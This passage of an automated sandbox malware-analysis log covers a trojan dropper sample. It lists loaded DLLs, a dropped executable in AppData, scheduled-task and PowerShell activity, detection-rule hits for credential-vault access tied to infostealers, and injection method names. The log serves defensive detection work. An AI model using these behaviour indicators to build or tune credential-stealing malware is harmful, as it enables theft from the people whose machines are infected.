                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: tXBTtgndxsp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, jeDZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, jeDZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, jeDZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, jeDZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, bVsFymTC04.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, bVsFymTC04.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, g1H.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, g1H.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, IuVXaGDxQlRyhibAhc.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, IuVXaGDxQlRyhibAhc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, IuVXaGDxQlRyhibAhc.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, IuVXaGDxQlRyhibAhc.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, IuVXaGDxQlRyhibAhc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, IuVXaGDxQlRyhibAhc.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3b423a0.7.raw.unpack, vM27roAJWyo67lq3Gv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.6d50000.11.raw.unpack, vM27roAJWyo67lq3Gv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.278bbc8.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.69e0000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.27e6770.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.2793be0.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/11@3/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile created: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3036:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD46C.tmpJump to behavior
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
